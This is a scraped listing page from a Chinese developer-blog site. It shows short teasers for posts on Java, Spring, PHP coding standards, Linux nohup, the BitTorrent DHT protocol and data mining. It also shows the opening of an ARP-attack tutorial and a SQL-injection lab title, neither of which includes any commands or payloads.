lua: local access_token = ngx.var.cookie_SGAccessToken if access_token then ngx.header["Set-Cookie"] = "SGAccessToken="..access_token.."; path=/;Max-Age=3000" end
java-打印不大于N的质数 bylijinnan java
public class PrimeNumber { /** * 寻找不大于N的质数 */ public static void main(String[] args) { int n=100; PrimeNumber pn=new PrimeNumber(); pn.printPrimeNumber(n); System.out.print
Spring源码学习-PropertyPlaceholderHelper bylijinnan java spring
今天在看Spring 3.0.0.RELEASE的源码，发现PropertyPlaceholderHelper的一个bug 当时觉得奇怪，上网一搜，果然是个bug，不过早就有人发现了，且已经修复：详见： http://forum.spring.io/forum/spring-projects/container/88107-propertyplaceholderhelper-bug
[逻辑与拓扑]布尔逻辑与拓扑结构的结合会产生什么? comsci 拓扑
如果我们已经在一个工作流的节点中嵌入了可以进行逻辑推理的代码,那么成百上千个这样的节点如果组成一个拓扑网络,而这个网络是可以自动遍历的,非线性的拓扑计算模型和节点内部的布尔逻辑处理的结合,会产生什么样的结果呢? 是否可以形成一种新的模糊语言识别和处理模型呢? 大家有兴趣可以试试,用软件搞这些有个好处,就是花钱比较少,就算不成
ITEYE 都换百度推广了 cuisuqiang Google AdSense 百度推广广告外快
以前ITEYE的广告都是谷歌的Google AdSense，现在都换成百度推广了。为什么个人博客设置里面还是Google AdSense呢？都知道Google AdSense不好申请，这在ITEYE上也不是讨论了一两天了，强烈建议ITEYE换掉Google AdSense。至少，用一个好申请的吧。什么时候能从ITEYE上来点外快，哪怕少点
新浪微博技术架构分析 dalan_123 新浪微博架构
新浪微博在短短一年时间内从零发展到五千万用户，我们的基层架构也发展了几个版本。第一版就是是非常快的，我们可以非常快的实现我们的模块。我们看一下技术特点，微博这个产品从架构上来分析，它需要解决的是发表和订阅的问题。我们第一版采用的是推的消息模式，假如说我们一个明星用户他有10万个粉丝，那就是说用户发表一条微博的时候，我们把这个微博消息攒成10万份，这样就是很简单了，第一版的架构实际上就是这两行字。第
玩转ARP攻击 dcj3sjt126com r
我写这片文章只是想让你明白深刻理解某一协议的好处。高手免看。如果有人利用这片文章所做的一切事情，盖不负责。网上关于ARP的资料已经很多了，就不用我都说了。用某一位高手的话来说，“我们能做的事情很多，唯一受限制的是我们的创造力和想象力”。 ARP也是如此。以下讨论的机子有一个要攻击的机子：10.5.4.178 硬件地址：52:54:4C:98
PHP编码规范 dcj3sjt126com 编码规范
一、文件格式 1. 对于只含有 php 代码的文件，我们将在文件结尾处忽略掉 "?>" 。这是为了防止多余的空格或者其它字符影响到代码。例如：<?php$foo = 'foo';2. 缩进应该能够反映出代码的逻辑结果，尽量使用四个空格，禁止使用制表符TAB，因为这样能够保证有跨客户端编程器软件的灵活性。例
linux 脱机管理（nohup） eksliang linux nohup nohup
脱机管理 nohup 转载请出自出处：http://eksliang.iteye.com/blog/2166699 nohup可以让你在脱机或者注销系统后，还能够让工作继续进行。他的语法如下 nohup [命令与参数] --在终端机前台工作 nohup [命令与参数] & --在终端机后台工作但是这个命令需要注意的是，nohup并不支持bash的内置命令，所
BusinessObjects Enterprise Java SDK greemranqq java BO SAP Crystal Reports
最近项目用到oracle_ADF 从SAP/BO 上调用水晶报表，资料比较少，我做一个简单的分享，给和我一样的新手提供更多的便利。首先，我是尝试用JAVA JSP 去访问的。官方API：http://devlibrary.businessobjects.com/BusinessObjectsxi/en/en/BOE_SDK/boesdk_ja
系统负载剧变下的管控策略 iamzhongyong 高并发
假如目前的系统有100台机器，能够支撑每天1亿的点击量（这个就简单比喻一下），然后系统流量剧变了要，我如何应对，系统有那些策略可以处理，这里总结了一下之前的一些做法。 1、水平扩展这个最容易理解，加机器，这样的话对于系统刚刚开始的伸缩性设计要求比较高，能够非常灵活的添加机器，来应对流量的变化。 2、系统分组假如系统服务的业务不同，有优先级高的，有优先级低的，那就让不同的业务调用提前分组
BitTorrent DHT 协议中文翻译 justjavac bit
前言做了一个磁力链接和BT种子的搜索引擎 {Magnet & Torrent}，因此把 DHT 协议重新看了一遍。 BEP: 5Title: DHT ProtocolVersion: 3dec52cb3ae103ce22358e3894b31cad47a6f22bLast-Modified: Tue Apr 2 16:51:45 2013 -070
Ubuntu下Java环境的搭建 macroli java 工作 ubuntu
配置命令：　　$sudo apt-get install ubuntu-restricted-extras 　　再运行如下命令：　　$sudo apt-get install sun-java6-jdk 　　待安装完毕后选择默认Java. 　　$sudo update- alternatives --config java 　　安装过程提示选择，输入“2”即可，然后按回车键确定。
js字符串转日期（兼容IE所有版本） qiaolevip TO Date String IE
/** * 字符串转时间（yyyy-MM-dd HH:mm:ss） * result （分钟） */ stringToDate : function(fDate){ var fullDate = fDate.split(" ")[0].split("-"); var fullTime = fDate.split("
【数据挖掘学习】关联规则算法Apriori的学习与SQL简单实现购物篮分析 superlxw1234 sql 数据挖掘关联规则
关联规则挖掘用于寻找给定数据集中项之间的有趣的关联或相关关系。关联规则揭示了数据项间的未知的依赖关系，根据所挖掘的关联关系，可以从一个数据对象的信息来推断另一个数据对象的信息。例如购物篮分析。牛奶 ⇒ 面包 [支持度：3%，置信度：40%] 支持度3%：意味3%顾客同时购买牛奶和面包。置信度40%：意味购买牛奶的顾客40%也购买面包。规则的支持度和置信度是两个规则兴
Spring 5.0 的系统需求，期待你的反馈 wiselyman spring
Spring 5.0将在2016年发布。Spring5.0将支持JDK 9。 Spring 5.0的特性计划还在工作中，请保持关注，所以作者希望从使用者得到关于Spring 5.0系统需求方面的反馈。

SQL注入(sqli-labs）手工注入+对抗WAF+SQLMAP自动化工具（第二关）

你可能感兴趣的:(SQLI)